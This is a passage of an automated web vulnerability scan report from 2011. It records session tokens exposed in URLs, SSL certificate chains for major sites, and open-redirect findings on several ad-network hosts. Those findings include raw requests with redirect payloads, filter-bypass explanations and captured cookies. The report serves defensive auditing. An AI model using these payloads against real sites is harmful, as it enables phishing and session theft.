<td colspan="3" align="right" valign="top" bgcolor="#ffffff" id="cart_info"><a href="https://www.asaservers.com/login.asp?sessionID={65F34CF8-E928-4463-FLSH}">| Log In / Register |</a><a href="https://www.asaservers.com/account_profile.asp?sessionID={65F34CF8-E928-4463-FLSH}"> My Account</a> | <a href="https://www.asaservers.com/basket.asp?sessionID={65F34CF8-E928-4463-FLSH}">VIEW CART</a> | <a href="https://www.asaservers.com/checkout.asp?sessionID={65F34CF8-E928-4463-FLSH} ">CHECKOUT</a>
...[SNIP]...
<td colspan="2"><a href="https://www.asaservers.com/checkout.asp?sessionID={65F34CF8-E928-4463-FLSH} "><img name="btn_checkout" src="images/top/btn_checkout.jpg" width="190" height="39" border="0" id="btn_checkout" alt="" />
...[SNIP]...
,28,224,6" href="javascript:;" alt="" onmouseout="MM_menuStartTimeout(1000);" onmouseover="MM_menuShowMenu('MMMenuContainer0526172751_0', 'MMMenu0526172751_0',224,28,'asaservers_menus');" />
<area shape="poly" coords="475,6,580,6,580,28,475,28,475,6" href="https://www.asaservers.com/account_profile.asp?sessionID={65F34CF8-E928-4463-FLSH}" alt="" />
<area shape="poly" coords="707,6,802,6,802,28,707,28,707,6" href="http://www.asaservers.com/showpages.asp?pid=1268" alt="" />
...[SNIP]...
</a> <a href="https://www.asaservers.com/account_profile.asp?sessionID={65F34CF8-E928-4463-FLSH}">My Account</a>
...[SNIP]...

12.22. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=6b01f688a268fc70a489a8b444b7d021&app_id=6b01f688a268fc70a489a8b444b7d021&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3c076982c%26origin%3Dhttp%253A%252F%252Ftimesofindia.indiatimes.com%252Ff25229271%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df16a8c2844%26origin%3Dhttp%253A%252F%252Ftimesofindia.indiatimes.com%252Ff25229271%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d49b42c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11b5caf%26origin%3Dhttp%253A%252F%252Ftimesofindia.indiatimes.com%252Ff25229271%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d49b42c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb776ee8c%26origin%3Dhttp%253A%252F%252Ftimesofindia.indiatimes.com%252Ff25229271%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d49b42c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8891b70%26origin%3Dhttp%253A%252F%252Ftimesofindia.indiatimes.com%252Ff25229271%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d49b42c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.108.30
X-Cnection: close
Date: Sun, 04 Sep 2011 02:27:14 GMT
Content-Length: 263

<script type="text/javascript">
parent.postMessage("cb=fb776ee8c&origin=http\u00253A\u00252F\u00252Ftimesofindia.indiatimes.com\u00252Ff25229271&relation=parent&transport=postmessage&frame=f5d49b42c",
...[SNIP]...

12.23. http://www.networkadvertising.org/managing/optout_results.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.networkadvertising.org
Path:   /managing/optout_results.asp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Content-Length: 873
Cache-Control: max-age=0
Origin: http://www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASBDATQ=FCNKKPJCMDIJJDNIDDFMIMFA; __utma=1.1392774634.1315133979.1315133979.1315133979.1; __utmb=1; __utmc=1; __utmz=1.1315133979.1.1.utmccn=(referral)|utmcsr=tidaltv.com|utmcct=/PrivacyDashboard.aspx|utmcmd=referral

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=9&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 11:12:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Sat, 03 Sep 2011 11:12:24 GMT
Cache-control: no-cache


<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>


       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">
   
<script src="http://ww
...[SNIP]...
<td valign=top><img src='http://info.yahoo.com/nai/optout.html?token=QTNjYXUuZUVQOUE-' width=15 height=15></td>
...[SNIP]...

12.24. http://www.networkadvertising.org/yahoo_handler  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.networkadvertising.org
Path:   /yahoo_handler

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /yahoo_handler?token=QTNjYXUuZUVQOUE- HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASBDATQ=FCNKKPJCMDIJJDNIDDFMIMFA; __utma=1.1392774634.1315133979.1315133979.1315133979.1; __utmb=1; __utmc=1; __utmz=1.1315133979.1.1.utmccn=(referral)|utmcsr=tidaltv.com|utmcct=/PrivacyDashboard.aspx|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 11:03:48 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

13. SSL certificate  previous  next
There are 10 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



13.1. https://market.android.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://market.android.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  *.google.com
Issued by:  Google Internet Authority
Valid from:  Thu Aug 11 21:49:02 GMT-06:00 2011
Valid to:  Sat Aug 11 21:59:02 GMT-06:00 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:  Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

13.2. https://adwords.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  adwords.google.com
Issued by:  Google Internet Authority
Valid from:  Thu Aug 11 21:49:49 GMT-06:00 2011
Valid to:  Sat Aug 11 21:59:49 GMT-06:00 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:  Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

13.3. https://asia.citi.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://asia.citi.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  asia.citi.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Wed Jun 22 18:00:00 GMT-06:00 2011
Valid to:  Sat Jun 22 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

13.4. https://docs.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://docs.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.google.com
Issued by:  Google Internet Authority
Valid from:  Thu Aug 11 21:49:02 GMT-06:00 2011
Valid to:  Sat Aug 11 21:59:02 GMT-06:00 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:  Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

13.5. https://mail.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mail.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  mail.google.com
Issued by:  Thawte SGC CA
Valid from:  Thu Dec 17 18:00:00 GMT-06:00 2009
Valid to:  Sun Dec 18 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  Thawte SGC CA
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed May 12 18:00:00 GMT-06:00 2004
Valid to:  Mon May 12 17:59:59 GMT-06:00 2014

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

13.6. https://maps-api-ssl.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.google.com
Issued by:  Google Internet Authority
Valid from:  Thu Aug 11 21:49:02 GMT-06:00 2011
Valid to:  Sat Aug 11 21:59:02 GMT-06:00 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:  Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

13.7. https://sites.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sites.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.google.com
Issued by:  Google Internet Authority
Valid from:  Thu Aug 11 21:49:02 GMT-06:00 2011
Valid to:  Sat Aug 11 21:59:02 GMT-06:00 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:  Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

13.8. https://twitter.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://twitter.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  twitter.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Wed Jul 06 18:00:00 GMT-06:00 2011
Valid to:  Fri Jul 27 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Wed Jul 16 17:59:59 GMT-06:00 2036

13.9. https://www.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.google.com
Issued by:  Thawte SGC CA
Valid from:  Thu Dec 17 18:00:00 GMT-06:00 2009
Valid to:  Sun Dec 18 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  Thawte SGC CA
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed May 12 18:00:00 GMT-06:00 2004
Valid to:  Mon May 12 17:59:59 GMT-06:00 2014

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

13.10. https://www.gotomeeting.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.gotomeeting.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.gotomeeting.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Thu May 12 18:00:00 GMT-06:00 2011
Valid to:  Wed Jun 06 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

14. Open redirection  previous  next
There are 32 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Remediation background

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:


14.1. http://a.tribalfusion.com/z/i.optout [success parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /z/i.optout

Issue detail

The value of the success request parameter is used to perform an HTTP redirect. The payload //aeb2ce98d543aab44/a%3fhttp%3a//www.networkadvertising.org/optout/opt_success.gif was submitted in the success parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by blocking absolute redirection targets starting with http:// or https://. However, an attacker can defeat this defence by omitting the protocol prefix from their absolute URL. If a redirection target starting with // is specified, then the browser will use the same protocol as the page which issued the redirection.

Remediation detail

When attempting to block absolute redirection targets, the application should verify that the target begins with a single slash followed by a letter, and should reject any input containing a sequence of two slash characters.

Request

GET /z/i.optout?f=0&success=//aeb2ce98d543aab44/a%3fhttp%3a//www.networkadvertising.org/optout/opt_success.gif&failure=http://www.networkadvertising.org/optout/opt_failure.gif&tagKey=117090495&requestor=agmtAZcW6EQMbBuQBACsBEnrPX3s8X3r8euN9itmqqQxSnmOQXlSrFPvrTEsrXc1Riqx86ZcPQMxwqPWuCP8SDPbtU7YmHtOXU HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 306
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Wed, 01-Sep-2021 11:35:59 GMT;
Content-Type: text/html
Location: //aeb2ce98d543aab44/a%3fhttp%3a//www.networkadvertising.org/optout/opt_success.gif
Content-Length: 36
Connection: keep-alive

<h1>Error 302 Moved Temporarily</h1>

14.2. http://a1.interclick.com/CookieCheck.aspx [hasCookies parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /CookieCheck.aspx

Issue detail

The value of the hasCookies request parameter is used to perform an HTTP redirect. The payload http%3a//ae130140877600e5f/a%3fhttp%3a//www.networkadvertising.org/verify/cookie_exists.gif was submitted in the hasCookies parameter. This caused a redirection to the following URL:

Request

GET /CookieCheck.aspx?optOut=http%3a%2f%2fwww.networkadvertising.org%2fverify%2fcookie_optout.gif&hasCookies=http%3a//ae130140877600e5f/a%3fhttp%3a//www.networkadvertising.org/verify/cookie_exists.gif&nocookies=http%3a%2f%2fwww.networkadvertising.org%2fverify%2fno_cookie.gif&nocache=0.887877 HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Opt=out

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 202
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://ae130140877600e5f/a?http://www.networkadvertising.org/verify/cookie_exists.gif
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sun, 04 Sep 2011 11:39:28 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://ae130140877600e5f/a?http://www.networkadvertising.org/verify/cookie_exists.gif">here</a>.</h2>
</body></html>
...[SNIP]...

14.3. http://a1.interclick.com/optOut.aspx [fail parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /optOut.aspx

Issue detail

The value of the fail request parameter is used to perform an HTTP redirect. The payload http%3a//ac734733adac36a07/a%3fhttp%3a//www.networkadvertising.org/optout/opt_failure.gif was submitted in the fail parameter. This caused a redirection to the following URL:

Request

GET /optOut.aspx?optOut=verify&success=http%3a%2f%2fwww.networkadvertising.org%2foptout%2fopt_success.gif&fail=http%3a//ac734733adac36a07/a%3fhttp%3a//www.networkadvertising.org/optout/opt_failure.gif HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Opt=out

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 200
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://ac734733adac36a07/a?http://www.networkadvertising.org/optout/opt_failure.gif
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sun, 04 Sep 2011 11:17:06 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://ac734733adac36a07/a?http://www.networkadvertising.org/optout/opt_failure.gif">here</a>.</h2>
</body></html>

14.4. http://clk.atdmt.com/goiframe/171946551/278612752/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /goiframe/171946551/278612752/direct

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a958f9a0b05e006c5/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /goiframe/171946551/278612752/direct?.a958f9a0b05e006c5/=1 HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.yahoo.com?.a958f9a0b05e006c5/=1
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=e2ff/25d1:233cf/25d1:ceda/2b2a4:66c2/2b2a3:f7d9/2b514:6be1/2618b; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=d518598/25d1/145a59c2/e2ff/4e3f43a9:d75a0d4/25d1/13ed2747/233cf/4e496158:d3ff520/2b2a4/13cf9a34/ceda/4e6039d7:d4250f2/2b2a3/13d2744e/66c2/4e603a12:dac239a/2b514/1471fe40/f7d9/4e62faf0:a3fb237/2618b/109b4b10/6be1/4e62faf6; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Sun, 04 Sep 2011 04:13:42 GMT
Connection: close


14.5. http://cmap.am.ace.advertising.com/amcm.ashx [admeld_callback parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cmap.am.ace.advertising.com
Path:   /amcm.ashx

Issue detail

The value of the admeld_callback request parameter is used to perform an HTTP redirect. The payload http%3a//a325f9f5482bfc6c6/a%3fhttp%3a//tag.admeld.com/match was submitted in the admeld_callback parameter. This caused a redirection to the following URL:

Request

GET /amcm.ashx?admeld_adprovider_id=1&admeld_call_type=redirect&admeld_callback=http%3a//a325f9f5482bfc6c6/a%3fhttp%3a//tag.admeld.com/match HTTP/1.1
Host: cmap.am.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUACping.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=MTMxNTA5NzMwOTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; ACID=Rq690013151032380008; ASCID=Rq690013151032380008; C2=HIuYO9aFHYIiGD8sQdwSkaMwSKMCdbdRrxK4IEscGAHtnggnraAc; F1=Bgg4i5EBAAAABAAAAIAAgEA; BASE=oTwUjn8fYrESn1x8Qj3fRMC!; ROLL=XpwfbsHr/Y/PQCLUeRRTttG!

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 04 Sep 2011 03:05:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Pragma: no-cache
Location: http://a325f9f5482bfc6c6/a?http://tag.admeld.com/match?admeld_adprovider_id=1&external_user_id=HEYg6aGKGzSaJPgwSI5KW3lwQnI&expiration=1317683107
Cache-Control: private, no-cache, max-age=0
Expires: Sun, 04 Sep 2011 03:05:07 GMT
Content-Length: 0


14.6. http://i.w55c.net/ping_match.gif [rurl parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /ping_match.gif

Issue detail

The value of the rurl request parameter is used to perform an HTTP redirect. The payload http%3a//ad6a2780f57aabe38/a%3fhttp%3a//pixel.rubiconproject.com/tap.php%3fv%3d4210%26nid%3d1523%26put%3d_wfivefivec_%26expires%3d10 was submitted in the rurl parameter. This caused a redirection to the following URL:

Request

GET /ping_match.gif?ei=RUBICON&rurl=http%3a//ad6a2780f57aabe38/a%3fhttp%3a//pixel.rubiconproject.com/tap.php%3fv%3d4210%26nid%3d1523%26put%3d_wfivefivec_%26expires%3d10 HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=4642/5271
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
